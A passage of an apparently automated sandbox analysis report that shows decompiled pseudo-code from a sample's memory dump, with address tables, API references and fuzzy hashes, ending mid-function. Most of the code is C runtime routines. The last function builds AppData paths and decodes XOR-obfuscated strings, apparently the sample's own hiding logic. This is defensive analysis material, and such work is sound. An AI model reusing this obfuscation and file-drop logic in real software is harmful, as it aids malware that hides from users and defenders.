						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E00E964B8(_t47);
							E00E9B726( *((intOrPtr*)(_t74 + 0x88)));
						}
						E00E964B8( *((intOrPtr*)(_t74 + 0x7c)));
						E00E964B8( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E00E964B8( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E00E964B8( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E00E964B8( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E00E964B8( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E00E9C2BE( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t55 = _t74 + 0xa0;
				_v8 = _t28;
				_t70 = _t74 + 0x28;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0xea93d8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E00E964B8(_t31);
							E00E964B8( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E00E964B8(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E00E964B8(_t74);
			}

0x00e9c153
0x00e9c157
0x00e9c15f
0x00e9c168
0x00e9c16d
0x00e9c174
0x00e9c17c
0x00e9c184
0x00e9c18f
0x00e9c195
0x00e9c196
0x00e9c19e
0x00e9c1a6
0x00e9c1b1
0x00e9c1b7
0x00e9c1bb
0x00e9c1c6
0x00e9c1cc
0x00e9c16d
0x00e9c1cd
0x00e9c1d5
0x00e9c1e8
0x00e9c1fb
0x00e9c209
0x00e9c214
0x00e9c219
0x00e9c222
0x00e9c22a
0x00e9c22b
0x00e9c231
0x00e9c234
0x00e9c237
0x00e9c23e
0x00e9c240
0x00e9c244
0x00e9c24c
0x00e9c253
0x00e9c259
0x00e9c25a
0x00e9c25a
0x00e9c261
0x00e9c263
0x00e9c268
0x00e9c270
0x00e9c275
0x00e9c276
0x00e9c276
0x00e9c279
0x00e9c27c
0x00e9c27f
0x00e9c282
0x00e9c282
0x00e9c294

APIs

___free_lconv_mon.LIBCMT ref: 00E9C18F

Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B28C
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B29E
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B2B0
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B2C2
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B2D4
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B2E6
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B2F8
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B30A
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B31C
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B32E
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B340
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B352
Part of subcall function 00E9B26F: _free.LIBCMT ref: 00E9B364

_free.LIBCMT ref: 00E9C184

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E9C1A6
_free.LIBCMT ref: 00E9C1BB
_free.LIBCMT ref: 00E9C1C6
_free.LIBCMT ref: 00E9C1E8
_free.LIBCMT ref: 00E9C1FB
_free.LIBCMT ref: 00E9C209
_free.LIBCMT ref: 00E9C214
_free.LIBCMT ref: 00E9C24C
_free.LIBCMT ref: 00E9C253
_free.LIBCMT ref: 00E9C270
_free.LIBCMT ref: 00E9C288

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 83f8b93381d1b6fcbffbb586f319a5c7943f4c55b3229b22822be3b61bb12744
Instruction ID: 9226b2aa5408f812d0ec24cda7520f08b1a90b64435b60ba8fb848e87609a82a
Opcode Fuzzy Hash: 83f8b93381d1b6fcbffbb586f319a5c7943f4c55b3229b22822be3b61bb12744
Instruction Fuzzy Hash: D4314F31500B049FEF20BBB9D845B5A73E8BF01354F60A41AF469F7161DB74AC808B25

Uniqueness

Uniqueness Score: -1.00%

Function 00E96543, Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00E96543(intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				signed int _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int* _v24;
				long _v28;
				long _v32;
				signed int _v36;
				void* _v44;
				void* _v48;
				signed int _v64;
				short _v66;
				char _v116;
				long _v196;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t110;
				signed int _t111;
				signed int _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				signed int _t119;
				signed int _t127;
				signed int _t132;
				intOrPtr* _t133;
				signed int _t141;
				void* _t147;
				signed int _t150;
				signed int _t159;
				void* _t162;
				signed int _t163;
				intOrPtr* _t164;
				intOrPtr _t168;
				signed int _t177;
				signed int _t188;
				intOrPtr* _t189;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				signed int _t197;
				signed int _t199;
				signed int _t201;
				signed int _t202;
				signed int _t206;
				signed int _t207;
				long _t208;
				long _t210;
				void* _t212;
				signed int* _t214;
				signed int _t215;
				signed int _t220;
				long _t223;
				signed int* _t227;
				void* _t234;
				signed int _t238;
				signed int _t239;
				signed int _t240;
				signed int _t252;
				void* _t257;
				signed int _t258;
				signed char _t261;
				void* _t264;
				signed int _t266;
				signed int _t267;
				char _t269;
				void* _t270;
				unsigned int _t272;
				signed int _t274;
				signed int* _t275;
				unsigned int _t277;
				signed int _t280;
				void* _t285;
				signed int _t287;
				void* _t290;
				void* _t292;
				void* _t293;
				void* _t294;

				_push(_t217);
				_t280 = _a8;
				if(_t280 != 0) {
					__eflags =  *_t280;
					if( *_t280 == 0) {
						goto L1;
					} else {
						_t111 = _a12;
						__eflags = _t111;
						if(_t111 == 0) {
							goto L1;
						} else {
							_t112 =  *_t111;
							__eflags = _t112;
							if(_t112 == 0) {
								goto L1;
							} else {
								__eflags =  *_t112;
								if( *_t112 == 0) {
									goto L1;
								} else {
									_t266 = E00EA5190(_t280, 0x5c);
									_t114 = E00EA5190(_t280, 0x2f);
									_t293 = _t292 + 0x10;
									_t206 = _t280;
									__eflags = _t114;
									if(_t114 != 0) {
										__eflags = _t266;
										if(_t266 == 0) {
											L20:
											_t266 = _t114;
										} else {
											__eflags = _t114 - _t266;
											if(_t114 > _t266) {
												goto L20;
											}
										}
										goto L21;
									} else {
										__eflags = _t266;
										if(_t266 != 0) {
											L21:
											asm("sbb esi, esi");
											_t280 =  ~(_t280 - _t206) & _t206;
											_t115 = E00EA5190(_t266, 0x2e);
											__eflags = _t115;
											if(_t115 == 0) {
												_t220 = _t206;
												_t257 = _t220 + 1;
												do {
													_t116 =  *_t220;
													_t220 = _t220 + 1;
													__eflags = _t116;
												} while (_t116 != 0);
												_v8 = _t220 - _t257 + 5;
												_t267 = E00E998AF(_t220 - _t257 + 5, 1);
												_pop(_t223);
												__eflags = _t267;
												if(_t267 != 0) {
													_t207 = _v8;
													_t119 = E00E96383(_t267, _t207, _t206);
													_t294 = _t293 + 0xc;
													__eflags = _t119;
													if(_t119 == 0) {
														_t188 = _t207 - 5 + _t267;
														__eflags = _t188;
														_v8 = _t188;
														_t189 = E00E95BBD();
														_t207 = 0xe75860;
														_v12 =  *_t189;
														while(1) {
															_t191 = E00E96383(_v8, 5, _t207);
															_t294 = _t294 + 0xc;
															__eflags = _t191;
															if(_t191 != 0) {
																goto L38;
															}
															_t192 = E00E96EA8(_t207, _t280, _t267, _t191);
															_pop(_t223);
															__eflags = _t192;
															if(_t192 == 0) {
																_t193 = E00E95BBD();
																_push(_a16);
																_push(_a12);
																 *_t193 = _v12;
																_push(_t267);
																_push(_a4);
																L39();
																_t215 = _t193;
																goto L36;
															} else {
																_t207 = _t207 + 5;
																__eflags = _t207 - 0xe75874;
																if(_t207 != 0xe75874) {
																	continue;
																} else {
																	E00E964B8(_t267);
																	goto L34;
																}
															}
															goto L103;
														}
													}
													goto L38;
												} else {
													_t215 = _t206 | 0xffffffff;
													L36:
													E00E964B8(_t267);
													goto L37;
												}
											} else {
												_t197 = E00E96EA8(_t206, _t280, _t206, 0);
												__eflags = _t197;
												if(_t197 != 0) {
													L34:
													_t215 = _t207 | 0xffffffff;
												} else {
													_push(_a16);
													_push(_a12);
													_push(_t206);
													_push(_a4);
													L39();
													_t215 = _t197;
												}
												L37:
												E00E964B8(_t280);
												_t110 = _t215;
												goto L13;
											}
										} else {
											_t266 = E00EA5190(_t280, 0x3a);
											__eflags = _t266;
											if(_t266 != 0) {
												goto L21;
											} else {
												_t252 = _t280;
												_t264 = _t252 + 1;
												do {
													_t199 =  *_t252;
													_t252 = _t252 + 1;
													__eflags = _t199;
												} while (_t199 != 0);
												_t267 = _t252 - _t264 + 3;
												_t207 = E00E998AF(_t267, 1);
												_pop(_t223);
												__eflags = _t207;
												if(_t207 != 0) {
													_t201 = E00E96383(_t207, _t267, 0xe7585c);
													_t294 = _t293 + 0xc;
													__eflags = _t201;
													if(_t201 != 0) {
														L38:
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														_push(0);
														E00E92919();
														asm("int3");
														_t290 = _t294;
														__eflags = _v36;
														if(_v36 == 0) {
															L40:
															 *((intOrPtr*)(E00E95BBD())) = 0x16;
															return E00E928EC() | 0xffffffff;
														}
														__eflags = _a8;
														if(_a8 == 0) {
															goto L40;
														}
														__eflags = _v0 - 4;
														if(_v0 > 4) {
															 *(E00E95BAA()) =  *_t186 & 0x00000000;
															goto L40;
														}
														_push(_t207);
														_push(_t267);
														_v20 = 0;
														_v12 = 0;
														_t127 = E00EA1217(_a8, _a12,  &_v20,  &_v12);
														_t208 = _t207 | 0xffffffff;
														__eflags = _t127 - _t208;
														if(_t127 == _t208) {
															E00E964B8(_v12);
															_v12 = 0;
															E00E964B8(_v20);
															L48:
															_t147 = _t208;
															L75:
															return _t147;
														}
														__eflags = _v0 - 4;
														_v16 = 0;
														_t132 = E00E96A8A( &_v16,  &_v24, (_t127 & 0xffffff00 | _v0 != 0x00000004) & 0x000000ff);
														__eflags = _t132;
														if(_t132 == 0) {
															E00E964B8(_v16);
															_v16 = 0;
															E00E964B8(_v12);
															_v12 = 0;
															E00E964B8(_v20);
															goto L48;
														}
														__eflags = _v0 - 4;
														_push(_t280);
														if(_v0 == 4) {
															_push(8);
															_pop(0);
														}
														_t133 = E00E95BAA();
														 *_t133 = 0;
														_t269 = 0x44;
														E00E8D0F0(_t269,  &_v116, 0, _t269);
														_v66 = _v24;
														_v64 = _v16;
														_v116 = _t269;
														_t141 = E00EA1292(_t223, __eflags, _a4, _v20, 0, 0, 1, 0, _v12, 0,  &_v116,  &_v48);
														_t285 = _v48;
														_t270 = _v44;
														__eflags = _t141;
														if(_t141 == 0) {
															L60:
															E00E95B87(GetLastError());
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															L70:
															E00E964B8(_v16);
															_v16 = _v16 & 0x00000000;
															E00E964B8(_v12);
															_v12 = _v12 & 0x00000000;
															E00E964B8(_v20);
															_t147 = _t208;
															L74:
															goto L75;
														}
														_t150 = _v0;
														__eflags = _t150 - 2;
														if(_t150 != 2) {
															__eflags = _t150;
															if(_t150 != 0) {
																__eflags = _t150 - 4;
																if(_t150 != 4) {
																	__eflags = _t270 - _t208;
																	if(_t270 != _t208) {
																		CloseHandle(_t270);
																	}
																	E00E964B8(_v16);
																	_v16 = _v16 & 0x00000000;
																	E00E964B8(_v12);
																	_t76 =  &_v12;
																	 *_t76 = _v12 & 0x00000000;
																	__eflags =  *_t76;
																	E00E964B8(_v20);
																	_t147 = _t285;
																	goto L74;
																}
																__eflags = _t270 - _t208;
																if(_t270 != _t208) {
																	CloseHandle(_t270);
																}
																__eflags = _t285 - _t208;
																if(_t285 != _t208) {
																	CloseHandle(_t285);
																}
																_t208 = 0;
																__eflags = 0;
																goto L70;
															}
															WaitForSingleObject(_t285, _t208);
															_t177 = GetExitCodeProcess(_v48,  &_v28);
															__eflags = _t177;
															if(_t177 == 0) {
																goto L60;
															}
															_v32 = _v28;
															__eflags = _t270 - _t208;
															if(_t270 != _t208) {
																CloseHandle(_t270);
															}
															__eflags = _t285 - _t208;
															if(_t285 != _t208) {
																CloseHandle(_t285);
															}
															_t208 = _v32;
															goto L70;
														}
														E00E92EE0(0);
														asm("int3");
														_push(_t290);
														_push(_t208);
														_t210 = _t223;
														_push(_t285);
														_push(_t270);
														_v196 = _t210;
														 *( *( *_t210)) =  *( *( *_t210)) & 0x00000000;
														 *( *( *(_t210 + 4))) =  *( *( *(_t210 + 4))) & 0x00000000;
														_t287 =  *0xeaa8c8; // 0x40
														__eflags = _t287;
														if(_t287 != 0) {
															_t80 = _t287 - 1; // 0x3f
															_t277 = _t80;
															while(1) {
																_t240 = (_t277 & 0x0000003f) * 0x38;
																_t168 =  *((intOrPtr*)(0xeaa6c8 + (_t277 >> 6) * 4));
																__eflags =  *((char*)(_t168 + _t240 + 0x28));
																if( *((char*)(_t168 + _t240 + 0x28)) == 0) {
																	goto L82;
																}
																_t277 = _t277 - 1;
																_t287 = _t287 - 1;
																__eflags = _t287;
																if(_t287 != 0) {
																	continue;
																}
																goto L82;
															}
														}
														L82:
														__eflags = _t287 - 0x3332;
														if(_t287 < 0x3332) {
															_v36 = 0x00000004 + _t287 * 0x00000005 & 0x0000ffff;
															_t159 = E00E998AF(0x00000004 + _t287 * 0x00000005 & 0x0000ffff, 1);
															_v28 = _t159;
															__eflags = _t159;
															if(_t159 != 0) {
																_t87 = _t159 + 4; // 0x4
																_t258 = _t87;
																 *_t159 = _t287;
																_t227 = _t258 + _t287;
																_v16 = _t258;
																_t272 = 0;
																_v20 = _t227;
																_v24 = _t227;
																__eflags = _t287;
																if(_t287 != 0) {
																	_t163 = _t258;
																	_t214 = _t227;
																	do {
																		_t238 = (_t272 & 0x0000003f) * 0x38 +  *((intOrPtr*)(0xeaa6c8 + (_t272 >> 6) * 4));
																		_t261 =  *((intOrPtr*)(_t238 + 0x28));
																		__eflags = _t261 & 0x00000010;
																		if((_t261 & 0x00000010) != 0) {
																			 *(_t163 + _t272) = 0;
																			_t239 = _t238 | 0xffffffff;
																			__eflags = _t239;
																		} else {
																			 *(_t163 + _t272) = _t261;
																			_t239 =  *(_t238 + 0x18);
																		}
																		 *_t214 = _t239;
																		_t272 = _t272 + 1;
																		_t214 =  &(_t214[1]);
																		__eflags = _t272 - _t287;
																	} while (_t272 != _t287);
																	_t159 = _v28;
																	_t210 = _v32;
																	_t258 = _v16;
																}
																__eflags =  *((char*)( *((intOrPtr*)(_t210 + 8))));
																if( *((char*)( *((intOrPtr*)(_t210 + 8)))) == 0) {
																	_t234 = 0;
																	__eflags = 0;
																	while(1) {
																		__eflags = _t287 - 3;
																		if(_t287 >= 3) {
																			_t274 = 3;
																		} else {
																			_t274 = _t287;
																		}
																		__eflags = _t234 - _t274;
																		if(_t234 != _t274) {
																			_t275 = _v20;
																			 *_t258 = 0;
																			 *_t275 =  *_t275 | 0xffffffff;
																			_t234 = _t234 + 1;
																			_t258 = _t258 + 1;
																			_v20 =  &(_t275[1]);
																			continue;
																		}
																		goto L100;
																	}
																}
																L100:
																 *( *( *_t210)) = _t159;
																_t107 =  &_v36; // 0xea6120
																_t212 = 1;
																__eflags = 1;
																 *( *( *(_t210 + 4))) =  *_t107;
															} else {
																_t164 = E00E95BBD();
																_t212 = 0;
																 *_t164 = 0xc;
															}
															E00E964B8(0);
															_t162 = _t212;
														} else {
															 *((intOrPtr*)(E00E95BBD())) = 0xc;
															_t162 = 0;
														}
														return _t162;
													} else {
														_t202 = E00EA0E2C(_t207, _t267, _t280);
														_t294 = _t294 + 0xc;
														__eflags = _t202;
														if(_t202 != 0) {
															goto L38;
														} else {
															_t5 = _t207 + 2; // 0x2
															_t266 = _t5;
															E00E964B8(_t202);
															goto L21;
														}
													}
												} else {
													_t110 = E00E964B8(_t200) | 0xffffffff;
													__eflags = _t110;
													L13:
													goto L14;
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00E95BBD())) = 0x16;
					_t110 = E00E928EC() | 0xffffffff;
					L14:
					return _t110;
				}
				goto L103;
			}

0x00e96549
0x00e9654b
0x00e96550
0x00e96567
0x00e9656a
0x00000000
0x00e9656c
0x00e9656c
0x00e9656f
0x00e96571
0x00000000
0x00e96573
0x00e96573
0x00e96575
0x00e96577
0x00000000
0x00e96579
0x00e96579
0x00e9657c
0x00000000
0x00e9657e
0x00e9658b
0x00e9658d
0x00e96592
0x00e96595
0x00e96597
0x00e96599
0x00e9661f
0x00e96621
0x00e96627
0x00e96627
0x00e96623
0x00e96623
0x00e96625
0x00000000
0x00000000
0x00e96625
0x00000000
0x00e9659f
0x00e9659f
0x00e965a1
0x00e96629
0x00e9662f
0x00e96632
0x00e96634
0x00e9663b
0x00e9663d
0x00e9666a
0x00e9666c
0x00e9666f
0x00e9666f
0x00e96671
0x00e96672
0x00e96672
0x00e9667e
0x00e96686
0x00e96689
0x00e9668a
0x00e9668c
0x00e96697
0x00e9669c
0x00e966a1
0x00e966a4
0x00e966a6
0x00e966af
0x00e966af
0x00e966b1
0x00e966b4
0x00e966b9
0x00e966c0
0x00e966c3
0x00e966c9
0x00e966ce
0x00e966d1
0x00e966d3
0x00000000
0x00000000
0x00e966d7
0x00e966dd
0x00e966de
0x00e966e0
0x00e966f9
0x00e966fe
0x00e96704
0x00e96707
0x00e96709
0x00e9670a
0x00e9670d
0x00e96715
0x00000000
0x00e966e2
0x00e966e2
0x00e966e5
0x00e966eb
0x00000000
0x00e966ed
0x00e966ee
0x00000000
0x00e966f3
0x00e966eb
0x00000000
0x00e966e0
0x00e966c3
0x00000000
0x00e9668e
0x00e9668e
0x00e96717
0x00e96718
0x00000000
0x00e9671d
0x00e9663f
0x00e96642
0x00e96649
0x00e9664b
0x00e966f4
0x00e966f4
0x00e96651
0x00e96651
0x00e96654
0x00e96657
0x00e96658
0x00e9665b
0x00e96663
0x00e96663
0x00e9671e
0x00e9671f
0x00e96725
0x00000000
0x00e96725
0x00e965a7
0x00e965af
0x00e965b3
0x00e965b5
0x00000000
0x00e965b7
0x00e965b7
0x00e965b9
0x00e965bc
0x00e965bc
0x00e965be
0x00e965bf
0x00e965bf
0x00e965c7
0x00e965d0
0x00e965d3
0x00e965d4
0x00e965d6
0x00e965f0
0x00e965f5
0x00e965f8
0x00e965fa
0x00e9672c
0x00e9672e
0x00e9672f
0x00e96730
0x00e96731
0x00e96732
0x00e96733
0x00e96738
0x00e9673c
0x00e96741
0x00e96745
0x00e96747
0x00e9674c
0x00000000
0x00e96757
0x00e9675f
0x00e96763
0x00000000
0x00000000
0x00e96765
0x00e96769
0x00e96770
0x00000000
0x00e96770
0x00e96775
0x00e96776
0x00e96780
0x00e96787
0x00e9678d
0x00e96792
0x00e96798
0x00e9679a
0x00e9679f
0x00e967a7
0x00e967aa
0x00e967f6
0x00e967f6
0x00e9693c
0x00000000
0x00e9693d
0x00e967b3
0x00e967b7
0x00e967c9
0x00e967d1
0x00e967d3
0x00e967d8
0x00e967e0
0x00e967e3
0x00e967eb
0x00e967ee
0x00000000
0x00e967f3
0x00e967fd
0x00e96801
0x00e96804
0x00e96806
0x00e96808
0x00e96808
0x00e96809
0x00e96810
0x00e96815
0x00e9681a
0x00e96823
0x00e9682a
0x00e96834
0x00e96849
0x00e9684e
0x00e96854
0x00e96857
0x00e96859
0x00e968a5
0x00e968ac
0x00e968b2
0x00e968b4
0x00e968b7
0x00e968b7
0x00e968bd
0x00e968bf
0x00e968c2
0x00e968c2
0x00e968e7
0x00e968ea
0x00e968f2
0x00e968f6
0x00e968fe
0x00e96902
0x00e96907
0x00e96938
0x00000000
0x00e9693b
0x00e9685b
0x00e9685e
0x00e96861
0x00e96867
0x00e96869
0x00e968ca
0x00e968cd
0x00e9690b
0x00e9690d
0x00e96910
0x00e96910
0x00e96919
0x00e96921
0x00e96925
0x00e9692d
0x00e9692d
0x00e9692d
0x00e96931
0x00e96936
0x00000000
0x00e96936
0x00e968cf
0x00e968d1
0x00e968d4
0x00e968d4
0x00e968da
0x00e968dc
0x00e968df
0x00e968df
0x00e968e5
0x00e968e5
0x00000000
0x00e968e5
0x00e9686d
0x00e9687a
0x00e96880
0x00e96882
0x00000000
0x00000000
0x00e96887
0x00e9688a
0x00e9688c
0x00e9688f
0x00e9688f
0x00e96895
0x00e96897
0x00e9689a
0x00e9689a
0x00e968a0
0x00000000
0x00e968a0
0x00e96944
0x00e96949
0x00e9694c
0x00e96952
0x00e96953
0x00e96955
0x00e96956
0x00e96957
0x00e9695e
0x00e96966
0x00e96969
0x00e9696f
0x00e96971
0x00e96973
0x00e96973
0x00e96976
0x00e96980
0x00e96983
0x00e9698a
0x00e9698f
0x00000000
0x00000000
0x00e96991
0x00e96992
0x00e96992
0x00e96995
0x00000000
0x00000000
0x00000000
0x00e96995
0x00e96976
0x00e96997
0x00e96997
0x00e9699d
0x00e969bd
0x00e969c0
0x00e969c5
0x00e969ca
0x00e969cc
0x00e969e0
0x00e969e0
0x00e969e3
0x00e969e5
0x00e969e8
0x00e969eb
0x00e969ed
0x00e969f0
0x00e969f3
0x00e969f5
0x00e969f7
0x00e969f9
0x00e969fb
0x00e96a08
0x00e96a0f
0x00e96a12
0x00e96a15
0x00e96a1f
0x00e96a23
0x00e96a23
0x00e96a17
0x00e96a17
0x00e96a1a
0x00e96a1a
0x00e96a26
0x00e96a28
0x00e96a29
0x00e96a2c
0x00e96a2c
0x00e96a30
0x00e96a33
0x00e96a36
0x00e96a36
0x00e96a3c
0x00e96a3f
0x00e96a41
0x00e96a41
0x00e96a43
0x00e96a43
0x00e96a46
0x00e96a4e
0x00e96a48
0x00e96a48
0x00e96a48
0x00e96a4f
0x00e96a51
0x00e96a53
0x00e96a56
0x00e96a59
0x00e96a5c
0x00e96a5d
0x00e96a61
0x00000000
0x00e96a61
0x00000000
0x00e96a51
0x00e96a43
0x00e96a66
0x00e96a6a
0x00e96a71
0x00e96a74
0x00e96a74
0x00e96a77
0x00e969ce
0x00e969ce
0x00e969d3
0x00e969d5
0x00e969d5
0x00e96a7b
0x00e96a81
0x00e9699f
0x00e969a4
0x00e969aa
0x00e969aa
0x00e96a89
0x00e96600
0x00e96603
0x00e96608
0x00e9660b
0x00e9660d
0x00000000
0x00e96613
0x00e96614
0x00e96614
0x00e96617
0x00000000
0x00e9661c
0x00e9660d
0x00e965d8
0x00e965df
0x00e965df
0x00e965e2
0x00000000
0x00e965e3
0x00e965d6
0x00e965b5
0x00e965a1
0x00e96599
0x00e9657c
0x00e96577
0x00e96571
0x00e96552
0x00e96552
0x00e96557
0x00e96562
0x00e965e4
0x00e965e8
0x00e965e8
0x00000000

APIs

_strrchr.LIBCMT ref: 00E96583
_strrchr.LIBCMT ref: 00E9658D
_strrchr.LIBCMT ref: 00E965AA
_free.LIBCMT ref: 00E965D9
_strrchr.LIBCMT ref: 00E96634
_free.LIBCMT ref: 00E96617

Part of subcall function 00E964B8: RtlFreeHeap.NTDLL(00000000,00000000,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?), ref: 00E964CE
Part of subcall function 00E964B8: GetLastError.KERNEL32(?,?,00E9B9CA,?,00000000,?,00000002,?,00E9BC6F,?,00000007,?,?,00E9C2E4,?,?), ref: 00E964E0

_free.LIBCMT ref: 00E96718
_free.LIBCMT ref: 00E9671F

Strings

ccs, xrefs: 00E966E5
.com, xrefs: 00E966B9, 00E966C3

Memory Dump Source

Source File: 0000000E.00000002.383289482.0000000000E71000.00000020.00020000.sdmp, Offset: 00E70000, based on PE: true

Associated: 0000000E.00000002.383276189.0000000000E70000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383409255.0000000000EA7000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.383420652.0000000000EA9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.383438304.0000000000EAC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free_strrchr$ErrorFreeHeapLast
String ID: .com$ccs
API String ID: 1244457489-1235067636
Opcode ID: f6ef72270dfcf69beda9225a526cec87c7675d73ccb54f6f59cc39186fcd5afc
Instruction ID: 865fbdf9510284291ab12ba545d3afa3b778d57a24500c307f84d7ad96b9b849
Opcode Fuzzy Hash: f6ef72270dfcf69beda9225a526cec87c7675d73ccb54f6f59cc39186fcd5afc
Instruction Fuzzy Hash: 77512C725006057BEF156BB49C42B7F37A8DF82368F15256FF814BB283FA629D008261

Uniqueness

Uniqueness Score: -1.00%

Function 00E84A91, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 187
stringprocessCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E00E84A91(void* __ebx, void* __edi, void* __esi, void* __ebp, void* __eflags) {
				signed int _v8;
				signed int _v48;
				char _v55;
				short _v68;
				intOrPtr _v72;
				char _v139;
				short _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				char _v156;
				char _v164;
				char _v184;
				struct _STARTUPINFOA _v260;
				struct _PROCESS_INFORMATION _v276;
				CHAR* _v280;
				CHAR* _v284;
				char _v291;
				char _v292;
				signed int _t49;
				CHAR* _t53;
				intOrPtr _t59;
				void* _t63;
				void _t64;
				void _t65;
				CHAR* _t71;
				char _t74;
				CHAR* _t90;
				CHAR* _t91;
				signed char _t92;
				void* _t97;
				signed int _t102;
				void* _t108;
				intOrPtr* _t109;
				void* _t112;
				signed int _t113;
				void* _t115;
				void* _t118;
				long _t123;
				intOrPtr* _t126;
				void* _t127;
				CHAR* _t128;
				CHAR* _t129;
				signed int _t132;
				void* _t134;

				_t132 =  &(_v260.lpDesktop);
				_t49 =  *0xea9014; // 0xa413846
				_v8 = _t49 ^ _t132;
				_v260.dwY = E00E909A2();
				E00E82861(0x104, __esi, _t51);
				_t53 = E00E909A2();
				_t126 = __imp__SHGetFolderPathA;
				_t90 = _t53;
				_v260.lpDesktop = _t90;
				 *_t126(0, 0x1c, 0, 0, _t90, 0x208, 0x104);
				asm("movaps xmm0, [0xe7db90]");
				_t97 = 0;
				asm("movups [esp+0x7c], xmm0");
				_v152 = 0x73203423;
				_v148 = 0x36223410;
				_v144 = 4;
				do {
					_t7 = _t97 + 0x40; // 0x40
					 *(_t132 + _t97 + 0x7c) =  *(_t132 + _t97 + 0x7c) ^ _t7;
					_t97 = _t97 + 1;
				} while (_t97 < 0x19);
				_v139 = 0;
				lstrcatA(_t90,  &_v164);
				_t59 = E00E909A2();
				_v276.hThread = _t59;
				_t91 = E00E909A2();
				_v276.dwThreadId = _t91;
				 *_t126(0, 0x1c, 0, 0, _t91, 0x104, 0x40);
				asm("movaps xmm0, [0xe7da90]");
				asm("movups [esp+0x7c], xmm0");
				_t63 = E00E82D2B( &_v184);
				_t112 = _t63;
				_t127 = _t63;
				do {
					_t64 =  *_t112;
					_t112 = _t112 + 1;
				} while (_t64 != 0);
				_t113 = _t112 - _t127;
				_t17 = _t91 - 1; // -1
				_t118 = _t17;
				do {
					_t65 =  *(_t118 + 1);
					_t118 = _t118 + 1;
				} while (_t65 != 0);
				_t102 = _t113 >> 2;
				memcpy(_t118, _t127, _t102 << 2);
				memcpy(_t127 + _t102 + _t102, _t127, _t113 & 0x00000003);
				_t134 = _t132 + 0x18;
				_t128 = _v292;
				E00E8A313(_t91, _t128, _t128);
				lstrcatA(_t91, _t128);
				E00E88B24(_v292, _t91);
				_push(0x208);
				_t71 = E00E909A2();
				asm("movaps xmm0, [0xe7de70]");
				_t129 = _t71;
				asm("movups [esp+0x9c], xmm0");
				asm("movaps xmm0, [0xe7dc70]");
				_t108 = 0;
				asm("movups [esp+0xa8], xmm0");
				_v72 = 0xd1cbc58d;
				asm("movaps xmm0, [0xe7de60]");
				asm("movups [esp+0xb8], xmm0");
				_v68 = 0x99;
				asm("movaps xmm0, [0xe7db80]");
				asm("movups [esp+0xc8], xmm0");
				asm("movaps xmm0, [0xe7df50]");
				asm("movups [esp+0xd8], xmm0");
				asm("movaps xmm0, [0xe7df80]");
				asm("movups [esp+0xe8], xmm0");
				do {
					_t24 = _t108 + 0x40; // 0x40
					 *(_t134 + _t108 + 0x98) =  *(_t134 + _t108 + 0x98) ^ _t24;
